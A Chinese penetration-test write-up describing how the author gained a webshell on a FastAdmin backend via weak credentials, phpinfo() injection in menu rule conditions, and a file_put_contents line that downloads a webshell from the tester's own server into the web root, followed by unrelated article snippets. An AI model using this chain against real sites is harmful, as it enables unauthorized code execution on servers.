<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記一次FastAdmin后臺Getshell

    VSole2022-10-21 09:44:28

    聲明:該公眾號大部分文章來自作者日常學習筆記,也有部分文章是經過作者授權和其他公眾號白名單轉載,未經授權,嚴禁轉載,如需轉載,聯系開白。

    請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者和本公眾號無關。

    FastAdmin介紹

    FastAdmin是基于ThinkPHP5和Bootstrap的極速后臺開發框架,基于ThinkPHP行為功能實現的插件機制,擁有豐富的插件和擴展,可直接在線安裝卸載。

    基于完善的Auth權限控制管理、無限父子級權限分組、可自由分配子級權限、一個管理員可同時屬于多個組別。

    測試過程

    在某次HVV的打點過程中,發現某資產為FastAdmin搭建。下圖為FastAdmin的報錯頁面,根據經驗可判斷該網站為FastAdmin搭建。

    輸入admin.php進入后臺登錄頁面,弱口令進入后臺。

    進入后臺找功能點getshell。后臺默認會有插件管理功能,但是我們在后臺沒有找到這個功能,我們直接訪問插件管理的地址

    /admin/addon?ref=addtabs
    

    理論上離線安裝 Fileix文件管理器 ,然后上傳一句話木馬就可以getshell,但是很可惜失敗了。

    接著翻后臺,發現有定時任務功能,嘗試反彈shell,寫入反彈shell的語句后,在服務器上nc監聽等待回連,但是發現并沒有執行。

    后面一看之前管理員設置過的定時任務也沒有執行過,失敗!

    繼續翻后臺,發現在菜單規則中可以創建規則條件,嘗試在功能點中寫入phpinfo()。

    必須寫在權限管理中!!!

    然后來到管理員管理中,添加一個管理員。

    所屬組別必須為二級管理員組!!!

    添加完成之后,重新用新添加的賬戶登錄后臺,可以發現phpinfo()被成功執行。

    通過搜索$_SERVER[‘DOCUMENT_ROOT’]獲取網站根目錄,為/www/wwwroot/xxxxxxxxx/

    找到根路徑后注銷賬戶,準備一個webshell木馬名為1.php,放在自己的服務器上,使用python啟動一個臨時web。

    python3 -m http.server 8080
    

    在回到管理后臺當中,在同樣的位置寫入如下語句,將遠程服務器的webshell木馬下載到網站根目錄。

    file_put_contents('/www/wwwroot/xxxxxxxxx/shell.php',file_get_contents('臨時web地址/1.php'))
    

    保存完成后,再次使用剛才新創建的用戶登錄


    webshell木馬已被成功寫入。

    總結

    在打點過程中, 通過指紋識別軟件進行指紋識別進行相應的漏洞利用,在未識別出指紋的需人工判斷,根據報錯頁面的樣式識別指紋一種較好的方法。

    整體打點過程:瀏覽網站—>發現報錯頁面指紋為FastAdmin—>通過弱口令進入后臺—>規則條件中寫入phpinfo()—>獲得網站根目錄—>規則條件中寫入webshell。

    后臺技術shell
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    DLL 代理加載 shellcode
    2020-10-27 17:59:01
    DLL側面加載或DLL代理加載允許攻擊者濫用合法的和經過簽名的可執行文件,以在受感染的系統上執行代碼。使用上面的示例流程,將發生以下情況。簽名,目標應該是經過數字簽名的“合法”可執行文件。在運行時不安全地加載少量DLL ,可執行流必須是可劫持的,但我們不希望將超過1-3個DLL放到目標上以使我們的攻擊才能順利進行。名稱應與原始DLL名稱匹配,命名“ libnettle-7”,然后單擊“創建”。我們使用SharpDllProxy生成源代碼時定義了文件名“ ”。
    請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者和本公眾號無關。FastAdmin介紹FastAdmin是基于ThinkPHP5和Bootstrap的極速后臺開發框架,基于ThinkPHP行為功能實現的插件機制,擁有豐富的插件和擴展,可直接在線安裝卸載。基于完善的Auth權限控制管理、無限父子級權限分組、可自由分配子級權限、一個管理員可同時屬于多個組別。測試過程在某次HVV的打點過程中,發現某資產為FastAdmin搭建。下圖為FastAdmin的報錯頁面,根據經驗可判斷該網站為FastAdmin搭建。
    作為擁有著10年經驗的滲透安全測試工程師,一路也是從小白歷經磨難成長起來的我,給現在的新手小白一些建
    通過工控攻防演示讓初學者學習web安全、內網滲透、工控安全相關知識技能。
    動態防護技術
    2022-07-13 17:20:00
    動態防護技術是面向App運行過程的防護,一方面可以通過App動態加固技術來實現,比如程序數據加解密保護、進程防動態調試保護、運行日志輸出保護、用戶信息輸入保護等;另一方面需要開發者在App實現方案中采用保護技術,如客戶端和服務器端通信過程的保護等。此次僅介紹App動態防護技術的實現思路,不討論具體的實現方案細節。
    今天公司做技術分享,分享了項目中的一個攻擊metinfo的案例,很有意思的攻擊鏈,記錄下。關于svn泄露需要注意的是SVN 版本 >1.7 時,Seay的工具不能dump源碼了。config/config.inc.php:109有了這個key,我們可以自己針對性去加密解密程序密文。正則匹配導致的注入全局搜索$auth->decode尋找可控的參數,并且不走過濾的。
    這個世界充滿了待解決的迷人問題,做一個黑客有很多樂趣,但是需要頗費氣力才能獲得這些樂趣。這些動力需要動機。
    前言前段時間讀了讀徐哥的《內網安全攻防》,并復現了部分知識點,寫篇文章記錄下學習內容。但在大多數情況下,內網的環境存在多種邊界設備以及入侵檢測裝置的限制,它們會對主機間或者內網與外網之間通信的流量進行檢測,如果存在異常就會進行攔截,這無疑給內網滲透增加了難度,而隱藏通信隧道技術就是為了繞過各種邊界設備的封鎖,從而完成主機間或內網與外網之間的通信。
    隨著智能家居技術的廣泛應用,智能家居作為物聯網技術在家居領域的典型應用得到了迅速的發展。然而,智能家居設備中存在的安全缺陷將直接威脅用戶的隱私安全甚至是生命財產安全,因此,針對智能家居的安全分析技術逐漸成為當前研究熱點。
    一. 應用層隧道技術1. ssh隧道建立雙向安全隧道將其他TCP端口的通信通過SSH連接轉發用SSH作為傳輸層協議,對流量自動加解密突破防火墻訪問規則的限制SSH本地端口轉發本機偵聽端口
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类